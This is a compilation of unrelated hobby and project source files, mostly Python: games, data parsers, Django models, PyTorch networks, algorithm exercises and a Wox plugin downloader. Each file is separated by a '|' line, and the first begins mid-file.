verticalalignment = 'center', transform=ax.transAxes,
fontweight = 'bold')
ax.text(0.37, 0.9, text, horizontalalignment = 'center',
verticalalignment = 'center', transform=ax.transAxes)
for loc in month_locs[3], month_locs[6], month_locs[9]:
ax.axvline(loc, color = 'grey', lw = 0.9, ls = ':')
plt.savefig('/home/ian/Dropbox/Work/Manuscripts/Writing/Gatum+_respiration/'
'Latex/Figs/Precip.png', bbox_inches = 'tight')
|
import functions
class Ship:
def __init__(self, bow, horizontal, length):
self.bow = bow
self.horizontal = horizontal
self.length = length
self.hit = [(i, j, False) for j in range(self.bow[1], self.bow[1]+self.length[1])
for i in range(self.bow[0], self.bow[0]+self.length[0])]
def shoot_at(self, tuple_):
tuple1 = tuple_ + (False,)
for i, tuple2 in enumerate(self.hit):
if tuple2 == tuple1:
self.hit[i] = tuple_ + (True,)
class Field:
def __init__(self):
self.__ships = [[None for i in range(10)]for j in range(10)]
self.field, field_data = functions.field_generate()
for ship in field_data:
ship1 = Ship(ship[0], ship[1], ship[2])
for coord in ship1.hit:
self.__ships[coord[0]][coord[1]] = ship1
def shoot_at(self, tuple1):
a = self.__ships[tuple1[0]][tuple1[1]]
if self.__ships[tuple1[0]][tuple1[1]] is None:
self.__ships[tuple1[0]][tuple1[1]] = "shooted"
elif type(self.__ships[tuple1[0]][tuple1[1]]) == Ship:
Ship.shoot_at(self.__ships[tuple1[0]][tuple1[1]], tuple1)
for i in self.__ships[tuple1[0]][tuple1[1]].hit:
if i[2] == False:
break
else:
for i in range(a.bow[0] - 1, a.bow[0] + a.length[0] + 1):
for j in range(a.bow[1] - 1, a.bow[1] + a.length[1] + 1):
if (i, j, True) not in a.hit and (0 <= i <= 10) \
and (0 <= j <= 10):
self.__ships[i][j] = "shooted"
def field_without_ships(self):
str1 = " A B C D E F G H I J\n"
for i, data in enumerate(self.__ships):
str1 += '%+2s' % str(i+1)
for j, sym in enumerate(data):
if sym == "shooted":
a = '*'
elif type(sym) == Ship and (i, j, True) in sym.hit:
a = "x"
else:
a = " "
str1 += " " + a
str1 += '\n'
return str1
def field_with_ships(self):
return self.__ships
class Player:
def __init__(self, name):
self.__name = name
def read_position(self):
x = str(input("Player {}, enter move"
.format(self.__name)).lower())
x2 = ord(x[0]) - ord('a')
x1 = int(x[1:])-1
return tuple([x1, x2])
last_iterat = 0
class Game:
def __init__(self, fields, players):
global last_iterat
last_iterat += 1
self.fields = fields
self.players = players
self.iterat = last_iterat
self.current_player = self.players[self.iterat % 2]
def read_position(self):
return self.current_player.read_position()
def field_without_ships(self, index):
a = self.fields[index-1].field_without_ships()
return a
def field_with_ships(self, index):
return self.fields[index-1].field_with_ships()
field1 = Field()
field2 = Field()
player1 = Player(1)
player2 = Player(2)
game = Game([field1, field2], [player1, player2])
while True:
for i in range(2):
a = game.players[i].read_position()
game.fields[i-1].shoot_at(a)
print(game.field_without_ships(i))
|
# This module wil allow the tester to use log data to run tests and get profiles
import re
import sys
import os
import csv
import datetime
import SimulationObjects as Sim
def readLog(fileName, fileDirectory, graphFlag=False):
# return a list of stepLists
# Metadata of the step lists follows this order:
# (problem, stepList) tuple, user, correctness, line (in the log)
# timeStamp, currentState tuple
filePath = None
if fileDirectory:
filePath = os.path.join(fileDirectory, fileName)
else:
filePath = fileName
with open(filePath, 'r') as log:
pointPattern = re.compile(r'\((?P<x>-{0,1}?[0-9]+), (?P<y>-{0,1}?[0-9]+)\)')
deletePattern = re.compile(r'\'label\':\'(?P<label>.*)\'')
timeStampPattern = re.compile(r'(?P<month>[0-9]{1,2})/(?P<day>[0-9]{1,2})/(?P<year>[0-9]{4}) - (?P<hour>[0-9]{1,2}):(?P<minute>[0-9]{1,2}):(?P<second>[0-9]{1,2})')
# This pattern should catch the robot's position and the
# last point placed.
currentStatePattern = re.compile(r'^R,(?P<x>-?[0-9]{1,2}),(?P<y>-?[0-9]{1,2}),(?P<rot>-?[0-9]{1,3}).*(:P[0-9],(?P<px>-?[0-9](\.[0-9]{2})?),(?P<py>-?[0-9](\.[0-9]{2}))$)?')
user = ''
logReader = csv.reader(log)
currentStepList = []
StepLists = []
TimeStamps = []
problem = None
currentState = []
lastRowTS = None
condition = ''
for line, row in enumerate(logReader):
if len(row) == 11:
# we expect the correct format hereafter
if 'prompt' in row or 'attribution' in row or 'checked emotions' in row:
continue
stateMatch = currentStatePattern.search(row[3])
timeStampMatch = timeStampPattern.search(row[0])
timeStamp = datetime.datetime(year=int(timeStampMatch.group('year')), month=int(timeStampMatch.group('month')), day=int(timeStampMatch.group('day')), hour=int(timeStampMatch.group('hour')), minute=int(timeStampMatch.group('minute')), second = int(timeStampMatch.group('second')))
TimeStamps.append(timeStamp)
if row[10]:
# get the session condition
condition = row[10]
# the state tuple is as follows:
# x position, y position, last point x, last point y
if stateMatch:
if stateMatch.group('px') and stateMatch.group('py'):
currentState = (float(stateMatch.group('x')), float(stateMatch.group('y')), int(stateMatch.group('rot')), float(stateMatch.group('px')), float(stateMatch.group('py')))
else:
currentState = (float(stateMatch.group('x')), float(stateMatch.group('y')), int(stateMatch.group('rot')), None, None)
else:
currentState = (None, None, None, None)
if row[8] != user:
user = row[8]
if 'moveDistance' in row[1]:
distance = int(row[2])
label = 'Move ' + str(distance)
name = 'moveDistance'
op = Sim.Op(distance=distance, angle=None)
pid = row[7]
step = Sim.Step(label=label, name=name, op=op, problemId=pid, state=currentState)
currentStepList.append(step)
elif 'turnAngle' == row[1]:
angle = int(row[2])
label = 'Turn '+ str(angle)
name = 'turnAngle'
pid = row[7]
op = Sim.Op(distance=None, angle=angle)
step = Sim.Step(label=label, name=name, op=op, problemId=pid, state=currentState)
currentStepList.append(step)
elif 'plotPoint' in row[1]:
pid = row[7]
op = None
step = Sim.Step(label='Plot Point', name='plotPoint', op=op, problemId=pid, state=currentState)
currentStepList.append(step)
##### META STEPS #####
#
# THIS SECTION ISNT USEFUL, delete does nothing!
# if 'Deleted step from list' in row:
# # remove the last step
# # NOTE some deletes dont change the robot's position!
# name = 'delete'
# match = deletePattern.search(row[3])
# if match:
# label = match.group('label')
# print(label)
# op = None
# step = Sim.Step(label=label, name=name, op=op)
# currentStepList.append(step)
#
elif 'reset' in row or 'replay' in row:
# NOTE we may want to just ingore this
# print(currentStepList, 'reset', line)
label = 'reset'
name = 'reset'
step = Sim.Step(label=label, name=name, op=None, state=currentState)
currentStepList.append(step)
elif 'Deleted step from list' in row:
lable = 'delete'
name = 'delete'
step = Sim.Step(label=label, name=name, op=None, state=currentState)
currentStepList.append(step)
elif 'Refresh' in row:
label = 'refresh'
name = 'refresh'
op = None
step = Sim.Step(label=label, name=name, op=op, state=currentState)
currentStepList.append(step)
elif 'correctness feedback' in row:
# determine the problem as well
# print('check')
correct = None
if 'correct' in row:
correct = True
else:
correct = False
probId = row[7]
problemString = row[6]
match = pointPattern.search(problemString)
if match:
x = int(match.group('x'))
y = int(match.group('y'))
point = Sim.Point('P1', x, y)
else:
point = Sim.Point('P1', 0, 0)
solution = Sim.Solution([], [point])
problem = Sim.Problem(probId=probId, solution=solution)
StepLists.append( {'problem':problem, 'stepList':list(currentStepList), 'user':user, 'correct':correct, 'line':line, 'timeStamps':TimeStamps, 'condition':condition} )
TimeStamps = []
currentStepList = []
stateList = []
currentProblem = -1
return StepLists
if __name__ == '__main__':
readLog('p34.csv', 'test_logs')
|
from Deadline.Scripting import *
import json
# This script is for Dealine Online Manager, maintained by elisha.
def __main__(dlArgs, qsArgs):
action = qsArgs.get('action', None)
job_id = qsArgs.get('id', None)
if action is None or job_id is None:
return ('Lacks of parameters', 404)
rep = RepositoryUtils
job = rep.GetJob(job_id, True)
if action == 'suspend':
rep.SuspendJob(job)
elif action == 'resume':
rep.ResumeJob(job)
elif action == 'resumefailed':
rep.ResumeFailedJob(job)
elif action == 'requeue':
rep.RequeueJob(job)
elif action == 'resubmit':
rep.ResubmitJob(job, job.JobFrames, job.JobFramesPerTask, False)
elif action == 'delete':
rep.DeleteJob(job)
return json.dumps({'delete': True})
elif action == 'complete':
rep.CompleteJob(job)
job = WebServiceUtils.GetJobInfo(job_id)
obj = {
'name': job['Name'],
'batch': job['BatchName'],
'plugin': job['PluginName'],
'user': job['UserName'],
'status': job['Status'],
'priority': job['Priority'],
'id': job['JobId'],
'submitDate': job['SubmitDateTimeString'],
'startDate': job['StartedDateTimeString'],
'completedDate': job['CompletedDateTimeString'],
'firstFrame': job['FirstFrame'],
'lastFrame': job['LastFrame'],
'taskCount': job['TaskCount'],
'pool': job['Pool'],
'completedTasks': job['JobCompletedTasks'],
'queuedTasks': job['JobQueuedTasks'],
'suspendedTasks': job['JobSuspendedTasks'],
'renderingTasks': job['JobRenderingTasks'],
'failedTasks': job['JobFailedTasks'],
'pendingTasks': job['JobPendingTasks'],
'errors': job['ErrorReports'],
'singleProgress': job['SingleTaskProgress'],
}
return json.dumps(obj)
|
from reef import database as db
from datetime import datetime
class BookRecord(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
book_id = db.Column(db.Integer, db.ForeignKey('book.id'), nullable=False)
reader_id = db.Column(db.Integer, db.ForeignKey('reader.id'), nullable=False)
created = db.Column(db.DateTime, index=True, default=datetime.utcnow)
user = db.relationship('User', backref=db.backref('book_records', lazy='dynamic'))
|
import matplotlib.pyplot as plt
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import torch.nn as nn
import torchvision
from torchvision import transforms
from torch.utils.data import DataLoader, random_split
class TwoLayerNet(pl.LightningModule):
def __init__(self, hparams, input_size=1 * 28 * 28, hidden_size=512, num_classes=10):
super().__init__()
self.hparams = hparams
self.model = nn.Sequential(
nn.Linear(input_size, hidden_size),
nn.Sigmoid(),
nn.Linear(hidden_size, num_classes),
)
def forward(self, x):
# flatten the image first
N, _, _, _ = x.shape
x = x.view(N, -1)
x = self.model(x)
return x
def training_step(self, batch, batch_idx):
images, targets = batch
# forward pass
out = self.forward(images)
# loss
loss = F.cross_entropy(out, targets)
# accuracy
_, preds = torch.max(out, 1) # convert output probabilities to predicted class
acc = preds.eq(targets).sum().float() / targets.size(0)
# logs
tensorboard_logs = {'loss': loss, 'acc': acc}
return {'loss': loss, 'log': tensorboard_logs}
def validation_step(self, batch, batch_idx):
images, targets = batch
# forward pass
out = self.forward(images)
# loss
loss = F.cross_entropy(out, targets)
# accuracy
_, preds = torch.max(out, 1)
acc = preds.eq(targets).sum().float() / targets.size(0)
if batch_idx == 0:
self.visualize_predictions(images, out.detach(), targets)
return {'val_loss': loss, 'val_acc': acc}
def validation_end(self, outputs):
avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
avg_acc = torch.stack([x['val_acc'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_loss, 'val_acc': avg_acc}
return {'val_loss': avg_loss, 'log': tensorboard_logs}
def visualize_predictions(self, images, preds, targets):
class_names = ['t-shirts', 'trouser', 'pullover', 'dress', 'coat', 'sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']
# determine size of the grid based on given batch size
num_rows = torch.tensor(len(images)).float().sqrt().floor()
fig = plt.figure(figsize=(10, 10))
for i in range(len(images)):
plt.subplot(num_rows ,len(images) // num_rows + 1, i+1)
plt.imshow(images[i].squeeze(0))
plt.title(class_names[torch.argmax(preds, axis=-1)[i]] + f'\n[{class_names[targets[i]]}]')
plt.axis('off')
self.logger.experiment.add_figure('predictions', fig, global_step=self.global_step)
def prepare_data(self):
# download
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))])
fashion_mnist_train = torchvision.datasets.FashionMNIST(root='../datasets', train=True,
download=True, transform=transform)
fashion_mnist_test = torchvision.datasets.FashionMNIST(root='../datasets', train=False,
download=True, transform=transform)
# train/val split
torch.manual_seed(0)
train_dataset, val_dataset = random_split(fashion_mnist_train, [50000, 10000])
torch.manual_seed(torch.initial_seed())
# assign to use in dataloaders
self.train_dataset = train_dataset
self.val_dataset = val_dataset
self.test_dataset = fashion_mnist_test
@pl.data_loader
def train_dataloader(self):
return DataLoader(self.train_dataset, shuffle=True, batch_size=self.hparams["batch_size"])
@pl.data_loader
def val_dataloader(self):
return DataLoader(self.val_dataset, batch_size=self.hparams["batch_size"])
def configure_optimizers(self):
optim = torch.optim.SGD(self.model.parameters(), self.hparams["learning_rate"], momentum=0.9)
return optim
|
from __future__ import unicode_literals
from django.db import models
class Customer(models.Model):
customer_id = models.CharField(max_length=100,primary_key=True)
customer_name = models.CharField(max_length=100)
customer_email = models.CharField(max_length=50)
customer_phone = models.CharField(max_length=10)
customer_password = models.CharField(max_length=100)
def __unicode__(self):
return self.customer_id
class Meta:
db_table = 'customer_tbl'
|
{
"targets": [
{
"target_name": "addon",
"sources": [ "src/extension.cc" ],
"include_dirs": [
"<!(node -e \"require('nan')\")",
],
"variables": {
"use_pkg_config": "<!(pkg-config --exists libtcmalloc || echo no)"
},
"conditions": [
[ "use_pkg_config=='no'", {
"libraries": [
"-ltcmalloc",
"-lprofiler"
]
}, {
"include_dirs": [
"<!@(pkg-config libprofiler libtcmalloc --cflags-only-I | sed s/-I//g)"
],
"libraries": [
"<!@(pkg-config libprofiler libtcmalloc --libs-only-l)"
],
"library_dirs": [
"<!@(pkg-config libprofiler libtcmalloc --libs-only-L | sed s/-L//g)"
]
}]
]
}
]
}
|
#Longest Common Subsequence
"""LCS Problem Statement: Given two sequences, find the length of longest
subsequence present in both of them. A subsequence is a sequence that appears
in the same relative order, but not necessarily contiguous. For example,
'abc',
'abg', 'bdf', 'aeg', 'acefg', .. etc are subsequences of 'abcdefg'."""
'''
def lcs(x,y,lenx,leny):
if lenx == 0 or leny == 0:
return 0
if x[lenx - 1] == y[leny - 1]:
return 1+lcs(x,y,lenx-1, leny - 1)
else:
return max(lcs(x,y,lenx, leny - 1), lcs(x,y,lenx-1, leny))
X = "AGGTAB"
Y = "GXTXAYB"
print "Length of LCS is ", lcs(X , Y, len(X), len(Y))
'''
'''
def lcs_mem(x,y,lenx,leny):
array = [[-1]*(leny+1) for i in range(lenx+1) ]
#print(array.shape)
if lenx == 0 or leny == 0:
return 0
if array[lenx][leny] != -1:
return array[lenx][leny]
if x[lenx - 1] == y[leny - 1]:
array[lenx][leny] = 1+lcs_mem(x,y,lenx-1, leny - 1)
return array[lenx][leny]
else:
array[lenx][leny] = max(lcs_mem(x,y,lenx, leny - 1), lcs_mem(x,y,lenx-1, leny))
return array[lenx][leny]
X = "AGGTAB"
Y = "GXTXAYB"
print "Length of LCS is ", lcs_mem(X , Y, len(X), len(Y))
'''
#top down approach
def lcs_topDown(x,y,lenx,leny):
array = [[-1]*(leny+1) for i in range(lenx+1) ]
S = ''
#print(array.shape)
for i in range(lenx+1):
for j in range(leny+1):
if i == 0 or j == 0:
array[i][j] = 0
if x[i - 1] == y[j - 1]:
array[i][j] = 1 + array[i-1][j-1]
S +=x[i-1]
print(x[i-1])
else:
array[i][j] = max(array[i][j - 1], array[i-1][j])
print("fnal array", array)
print("String", S)
return array[lenx][leny]
import numpy as np
Y = "ABCDAF"
X = "ACBCF"
array = [[-1]*(len(Y)+1) for i in range(len(X)+1) ]
print(array,np.array(array).shape)
print "Length of LCS is ", lcs_topDown(X , Y, len(X), len(Y))
|
# Generated by Django 3.1.5 on 2021-01-30 16:53
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='gpxFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='Title')),
('gpx_file', models.FileField(upload_to='gpx_files/%Y/%m/%d')),
],
),
migrations.CreateModel(
name='Incidence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('location', django.contrib.gis.db.models.fields.PointField(srid=4326)),
],
),
migrations.CreateModel(
name='WorldBorder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('area', models.IntegerField()),
('pop2005', models.IntegerField(verbose_name='Population 2005')),
('fips', models.CharField(max_length=2, null=True, verbose_name='FIPS Code')),
('iso2', models.CharField(max_length=2, verbose_name='2 Digit ISO')),
('iso3', models.CharField(max_length=3, verbose_name='3 Digit ISO')),
('un', models.IntegerField(verbose_name='United Nations Code')),
('region', models.IntegerField(verbose_name='Region Code')),
('subregion', models.IntegerField(verbose_name='Sub-Region Code')),
('lon', models.FloatField()),
('lat', models.FloatField()),
('mpoly', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
],
),
migrations.CreateModel(
name='GPXTrack',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('track', django.contrib.gis.db.models.fields.MultiLineStringField(srid=4326)),
('gpx_file', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reporter.gpxfile')),
],
),
migrations.CreateModel(
name='GPXPoint',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=50, verbose_name='Name')),
('description', models.CharField(blank=True, max_length=250, verbose_name='Description')),
('point', django.contrib.gis.db.models.fields.PointField(srid=4326)),
('gpx_file', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reporter.gpxfile')),
],
),
]
|
# 5-1
# class Carre:
# def __init__(self, cote):
# self.cote = cote
# a = Carre(10)
# print(a.cote)
# class Carre:
# def __init__(self, cote):
# self.unCote = cote
# self.perimetre = self.fctPerimetre()
# self.aire = self.unCote * self.unCote
# def fctPerimetre(self):
# return self.unCote * 4
# if __name__ == '__main__' :
# a = Carre(10)
# print("Le carré à un côté d'une longueur de " + str(a.unCote) + ", une aire de " + str(a.aire) + " et un périmètre de " + str(a.perimetre) + ".")
# class Carre:
# def __init__(self, cote):
# self.unCote = cote
# self.perimetre = self.fctPerimetre()
# self.aire = self.unCote * self.unCote
# def fctPerimetre(self):
# return self.unCote * 4
# if __name__ == '__main__' :
# a = Carre(10)
# b = Carre(5)
# print(a.aire + b.aire)
# class Carre:
# def __init__(self, cote):
# self.unCote = cote
# self.perimetre = self.fctPerimetre()
# self.aire = self.unCote * self.unCote
# def fctPerimetre(self):
# return self.unCote * 4
# if __name__ == '__main__' :
# a = Carre(10)
# b = Carre(5)
# print(a.aire - b.aire)
|
"""An Apache Beam bounded source for PostgreSQL"""
from typing import Union
from apache_beam.io import iobase
from apache_beam.options.value_provider import ValueProvider
from postgres_connector.splitters import BaseSplitter
from postgres_connector.client import PostgresClient
from postgres_connector.utils import clean_query
from postgres_connector.utils import get_runtime_value
class PostgresSource(iobase.BoundedSource):
"""A source object of mysql."""
def __init__(
self,
query: Union[str, ValueProvider],
host: Union[str, ValueProvider],
database: Union[str, ValueProvider],
user: Union[str, ValueProvider],
password: Union[str, ValueProvider],
port: Union[int, ValueProvider],
splitter: BaseSplitter,
):
super().__init__()
self._query = query
self._host = host
self._database = database
self._user = user
self._password = password
self._port = port
self._is_initialized = False
self._config = {
"host": self._host,
"database": self._database,
"user": self._user,
"password": self._password,
"port": self._port,
}
self._splitter = splitter
def estimate_size(self):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.estimate_size`"""
if not self._is_initialized:
self._initialize()
return self._splitter.estimate_size()
def get_range_tracker(self, start_position, stop_position):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.get_range_tracker`"""
if not self._is_initialized:
self._initialize()
return self._splitter.get_range_tracker(start_position, stop_position)
def read(self, range_tracker):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.read`"""
for record in self._splitter.read(range_tracker):
yield record
def split(self, desired_bundle_size, start_position=None, stop_position=None):
"""Implement :class:`~apache_beam.io.iobase.BoundedSource.split`"""
if not self._is_initialized:
self._initialize()
for split in self._splitter.split(desired_bundle_size, start_position, stop_position):
yield split
def _initialize(self):
for k, v in self._config.items():
self._config[k] = get_runtime_value(v)
self.query = clean_query(get_runtime_value(self._query))
self.client = PostgresClient(self._config)
self._splitter.build_source(self)
self._is_initialized = True
|
# Day 14: Docking Data
# <ryc> 2021
import re
def inputdata():
stream = open('day_14_2020.input')
data = []
for line in stream:
record = re.findall('(mask) = ([01X]+)|(mem)\[(\d+)\] = (\d+)',line)
if record[0][0] == 'mask':
maskN = 0
maskX = 0
maskv = 0x800000000
maskV = []
for char in record[0][1]:
maskN *= 2
maskX *= 2
if char == 'X':
maskX += 1
maskV.insert(0,maskv)
else:
maskN += int(char)
maskv >>= 1
data.append(['mask', maskN, maskX, maskV])
else:
data.append([record[0][2], int(record[0][3]), int(record[0][4])])
stream.close()
return data
def emulator_v1(program):
mem = dict()
maskN = 0
maskX = ~ 0
for line in program:
if line[0] == 'mask':
maskN = line[1]
maskX = line[2]
else:
mem[line[1]] = ( line[2] & maskX ) | maskN
value = 0
for record in mem.values():
value += record
return value
def emulator_v2(program):
mem = dict()
maskN = 0
maskX = ~ 0
maskV = []
for line in program:
if line[0] == 'mask':
maskN = line[1]
maskX = line[2]
maskV = [ 0 ]
for i in line[3]:
branch = []
for j in maskV:
branch.append(i + j)
maskV.extend(branch)
else:
base = ( line[1] | maskN ) & ~ maskX
for offset in maskV:
mem[base + offset] = line[2]
value = 0
for record in mem.values():
value += record
return value
if __name__ == '__main__':
print('\n14: Docking Data')
program = inputdata()
print('\nemulator v1 =',emulator_v1(program))
print('\nemulator v2 =',emulator_v2(program))
|
import os, wget
import zipfile
PLUGINS_PATH = os.path.join(os.environ['APPDATA'], 'Wox', 'Plugins')
plugins_url = [
'http://api.wox.one/media/plugin/E2D2C23B084D41D1B6F60EC79D62CAH6/Wox.Plugin.IPAddress-275940ee-7ada-4a8a-b874-309e6034f39f.wox',
'http://api.wox.one/media/plugin/5C0BFEC0DF7011E695980800200C9A66/YoutubeQuery-086bc2f7-a21f-4f76-9f29-349fb7534ce4.wox',
'http://api.wox.one/media/plugin/ca8c0c3dea2e4f75833482489587d33d/Simple Web Search-999fc5f3-cc79-4ce4-81df-da1ae0497a65.wox',
'http://api.wox.one/media/plugin/39F78C8D0A5B408595753263017A039A/Wox.Plugin.PirateBay-fd2ad92a-af92-4810-b555-49711397fee4.wox',
'http://api.wox.one/media/plugin/13F6E017E889C82D4BAB954BB1E0D19C/Wox.Plugin.KickassTorrent-95bb9266-3844-4bef-a057-82ef4692e09d.wox',
'http://api.wox.one/media/plugin/6c22cffe6b3546ec9087abe149c4a575/Wox.Plugin.Github-1.1.0-c3e6b661-2252-4061-83ae-5890ade1592a.wox',
'http://api.wox.one/media/plugin/5B7E53D506844D2D8B7001AA19F5EF8F/Wox.Plugin.Todos-566b9986-dda3-437a-aa8b-fcf9b953aedc.wox',
'http://api.wox.one/media/plugin/BB36CF20434311E6BDF40800200C9A66/Wox.Plugin.Giphy-7100cf9a-4be7-467f-951f-d15d843ecae7.wox',
'http://api.wox.one/media/plugin/8d80430bbaeb4e49a002213c3bd88c66/Wox.Plugin.Timestamp-1.0-4d9c8352-c081-4aca-80d3-c10e167ae5b1.wox',
'http://api.wox.one/media/plugin/D2D2C23B084D411DB66EE0C79D6C2A6C/Wox.Plugin.ProcessKiller-5991960e-418a-49ad-9fa1-e9b4dab2d23c.wox'
]
for pl_url in plugins_url:
woxfile = wget.download(pl_url, out=PLUGINS_PATH)
with zipfile.ZipFile(woxfile, 'r') as zip_ref:
zip_ref.extractall(os.path.join(PLUGINS_PATH, woxfile.split('/')[-1][:-4]))
|
import sys
n , m = [int(e) for e in input().strip().split()]
v = [int(e) for e in sys.stdin.readline().strip().split()]
w = [int(e) for e in sys.stdin.readline().strip().split()]
V = [[int(e) for e in sys.stdin.readline().strip().split()] for i in range(n+1)]
x = [0 for i in range(n)] ; count = 0
while V[n][m] != 0:
if V[n][m] == V[n-1][m]:
n -= 1
elif V[n][m] == V[n-1][m-w[n-1]] + v[n-1]:
x[n-1] = 1
count += 1
m -= w[n-1]
n -= 1
if V[n][m] == v[n-1]:
count += 1
x[n-1] = 1
break
print(count)
for i in range(len(x)):
if x[i] == 1: print(i+1, end=" ")
"""def Knapsack(i,v,w,W,d = dict()):
if W == 0: return 0
if W < 0: return float('-inf')
if i == len(v): return float('-inf')
if (i,W) in d: return d[(i,W)]
a = Knapsack(i+1,v,w,W-w[i],d)
b = Knapsack(i+1,v,w,W,d)
r = max(a,b)
d[(i,W)] = r
return r
"""
|
import tkinter
import tkinter.ttk as ttk
import editor
from util_frames import NewGameFrame, LoadGameFrame
from cbs_window import *
from world import world, set_world
from main_frames import PlayerActorFrame, CurrentLocationFrame
import os
import shutil
class Application(ttk.Frame):
def __init__(self, master=None):
ttk.Frame.__init__(self, master, width=1000, height=500)
self.grid()
self.grid_propagate(0)
self.file_menu = None
self.menu_bar = None
self.create_top_menu()
self.main_notebook = ttk.Notebook(self)
self.main_notebook.grid()
self.editor_frame = editor.EditorMasterFrame(self)
self.main_notebook.add(self.editor_frame, text='Editor')
def create_top_menu(self):
top = self.winfo_toplevel()
self.menu_bar = tkinter.Menu(top)
top['menu'] = self.menu_bar
self.file_menu = tkinter.Menu(self.menu_bar, tearoff=0)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.file_menu.add_command(label='New', command=self._b_new_game)
self.file_menu.add_command(label='Load', command=self._b_load_game)
def _b_new_game(self):
w = CBSWindow(self, 'New', 10, 10)
new_game_frame = NewGameFrame(w, self)
new_game_frame.grid()
new_game_frame.grab_set()
def _b_load_game(self):
w = CBSWindow(self, 'New', 10, 10)
load_game_frame = LoadGameFrame(w, self)
load_game_frame.grid()
load_game_frame.grab_set()
def start_new(self, new_db):
set_world(new_db)
player_actor_frame = PlayerActorFrame(self)
current_location_frame = CurrentLocationFrame(self)
self.main_notebook.add(player_actor_frame, text='Character')
self.main_notebook.add(current_location_frame, text='Location')
self.main_notebook.hide(self.editor_frame)
self.main_notebook.bind('<<NotebookTabChanged>>', player_actor_frame.refresh)
def create_new_save(self, name, player_actor):
new_dir = 'saves\\' + name
os.makedirs(new_dir)
new_db = new_dir + '\\database.db'
shutil.copyfile('database.db', new_db)
f = open(new_dir + '\\save.info', mode='w')
f.write(str(player_actor.actor_id))
world.player_actor = player_actor
self.start_new(new_db)
def load_save(self, name):
f = open('saves\\' + name + '\\save.info', mode='r')
actor_id = int(f.readline())
world.set_player_actor_id(actor_id)
new_db = 'saves\\' + name + '\\database.db'
self.start_new(new_db)
app = Application()
app.master.title("CBS")
app.mainloop()
|
import tarfile
import os
import sys
import pickle
#import tensorflow as tf
from datetime import datetime
from multiprocessing import Pool
import getopt
from itertools import repeat
import psutil
sys.path.append('../../lib/')
import return_type_lib
import common_stuff_lib
import tarbz2_lib
import pickle_lib
#import disassembly_lib
#import tfrecord_lib
def check_config(config):
if config['base_dir'] == '':
print(f'Please specify a base-dir (-b or --base-dir) , where all work is done. Check -h for help.')
print()
exit()
def main():
config = common_stuff_lib.parseArgs()
print(f'config >{config}<')
print()
check_config(config)
nr_of_cpus = psutil.cpu_count(logical=True)
print(f'We got >{nr_of_cpus}< CPUs for threading')
print()
print(f"Using files in directory >{config['tfrecord_save_dir']}<")
print()
return_type_dict = pickle_lib.get_pickle_file_content(config['tfrecord_save_dir'] + 'return_type_dict.pickle')
print(f'return_type_dict value >{return_type_dict}<')
print()
vocabulary_list= pickle_lib.get_pickle_file_content(config['tfrecord_save_dir'] + 'vocabulary_list.pickle')
print(f'vocabulary_list >{vocabulary_list}<')
print()
print(f'vocabulary_list length >{len(vocabulary_list)}<')
print()
max_seq_length = pickle_lib.get_pickle_file_content(config['tfrecord_save_dir'] + 'max_seq_length.pickle')
print(f'max_seq_length >{max_seq_length}<')
if __name__ == "__main__":
main()
|
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
from torch.autograd import Function
def make_vgg(image_size):
layers = []
in_channels = 3 # 色チャネル数
cfg = [ # 層の構造をリストで定義する # 統一でよさそう?
64, 64, 'M',
128, 128, 'M',
256, 256, 256, 'M', ## fix MC -> M
512, 512, 512, 'M',
512, 512, 512
]
if image_size == 300:
cfg = [
64, 64, 'M',
128, 128, 'M',
256, 256, 256, 'MC',
512, 512, 512, 'M',
512, 512, 512
]
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'MC':
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
layers += [pool5, conv6, nn.ReLU(inplace=True),
conv7, nn.ReLU(inplace=True)]
return nn.ModuleList(layers)
def make_extras():
layers = []
in_channels = 1024 # vggモジュールから出力された、extraに入力される画像チャネル数
cfg = [256, 512,
128, 256,
128, 256,
128, 256]
layers += [nn.Conv2d(in_channels, cfg[0], kernel_size=(1))]
layers += [nn.Conv2d(cfg[0], cfg[1], kernel_size=(3), stride=2, padding=1)]
layers += [nn.Conv2d(cfg[1], cfg[2], kernel_size=(1))]
layers += [nn.Conv2d(cfg[2], cfg[3], kernel_size=(3), stride=2, padding=1)]
layers += [nn.Conv2d(cfg[3], cfg[4], kernel_size=(1))]
layers += [nn.Conv2d(cfg[4], cfg[5], kernel_size=(3))]
layers += [nn.Conv2d(cfg[5], cfg[6], kernel_size=(1))]
layers += [nn.Conv2d(cfg[6], cfg[7], kernel_size=(3))]
return nn.ModuleList(layers)
